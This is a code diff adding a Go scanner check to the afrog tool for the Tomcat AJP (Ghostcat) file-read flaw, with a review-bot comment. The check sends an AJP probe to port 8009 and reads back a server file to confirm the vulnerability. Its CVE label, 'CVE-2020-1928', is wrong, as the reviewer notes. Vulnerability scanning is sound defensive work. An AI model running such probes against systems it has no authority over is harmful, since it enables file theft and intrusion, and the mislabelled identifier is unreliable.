| 1 | + | package gopoc |
| 2 | + | |
| 3 | + | import ( |
| 4 | + | "bytes" |
| 5 | + | "errors" |
| 6 | + | |
| 7 | + | "github.com/zan8in/afrog/pkg/poc" |
| 8 | + | "github.com/zan8in/afrog/pkg/proto" |
| 9 | + | "github.com/zan8in/afrog/pkg/utils" |
| 10 | + | ) |
| 11 | + | |
| 12 | + | var ( |
| 13 | + | tomcatAjpPort = "8009" |
| 14 | + | tomcatAjpUnAuthName = "CVE-2020-1928" |
| 15 | + | ) |
| 16 | + | |
| 17 | + | func tomcatAjpUnAuth(args *GoPocArgs) (Result, error) { |
| 18 | + | poc := poc.Poc{ |
| 19 | + | Id: tomcatAjpUnAuthName, |
| 20 | + | Info: poc.Info{ |
| 21 | + | Name: "Apache Tomcat AJP 文件读取与包含漏洞", |
| 22 | + | Author: "zan8in", |
| 23 | + | Severity: "high", |
| 24 | + | Description: "Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。", |
| 25 | + | Reference: []string{ |
| 26 | + | "https://blog.csdn.net/qq_44159028/article/details/112507136", |
| 27 | + | }, |
| 28 | + | }, |
| 29 | + | } |
| 30 | + | args.SetPocInfo(poc) |
| 31 | + | result := Result{Gpa: args, IsVul: false} |
| 32 | + | |
| 33 | + | if len(args.Host) == 0 { |
| 34 | + | return result, errors.New("no host") |
| 35 | + | } |
| 36 | + | |
| 37 | + | addr := args.Host + ":" + tomcatAjpPort |
| 38 | + | payload := []byte("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") |
| 39 | + | |
| 40 | + | resp, err := utils.Tcp(addr, utils.HexDecode(string(payload))) |
| 41 | + | if err != nil { |
| 42 | + | return result, err |
| 43 | + | } |
| 44 | + | |
| 45 | + | if bytes.Contains(resp, []byte("Licensed to the Apache Software Foundation")) { |
| 46 | + | result.IsVul = true |
| 47 | + | url := proto.UrlType{Host: addr, Port: tomcatAjpPort} |
| 48 | + | result.SetAllPocResult(true, &url, utils.HexDecode(string(payload)), resp) |
| 49 | + | return result, nil |
| 50 | + | } |
| 51 | + | |
| 52 | + | return result, errors.New("check result: no vul") |
| 53 | + | } |
| 54 | + | |
| 55 | + | func init() { |
| 56 | + | GoPocRegister(tomcatAjpUnAuthName, tomcatAjpUnAuth) |
| 57 | + | } |
| 58 | + | |
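Review bot: The identifier on line 14, `tomcatAjpUnAuthName = "CVE-2020-1928"`, does not appear to match the advisory this check describes — the Tomcat AJP file read/inclusion issue it names is tracked as CVE-2020-1938 — and because the constant is both the PoC Id (line 19) and the GoPocRegister key (line 56), a wrong value would misattribute every finding in reports, so please verify it against the CVE record before merging. On line 47 `proto.UrlType{Host: addr, Port: tomcatAjpPort}` passes `addr`, which already carries the `:8009` suffix built on line 37, so Host presumably should be `args.Host` to avoid a doubled port in the recorded result. `utils.HexDecode(string(payload))` is evaluated twice (lines 40 and 48); decode once into a local, e.g. `probe := utils.HexDecode(string(payload))`, and pass `probe` to both calls. The payload literal on line 38 is redacted in this view, so its contents could not be reviewed, and the `utils.Tcp` call shows no timeout here — confirm it bounds the connect and read, since an unresponsive AJP listener would otherwise stall the scan.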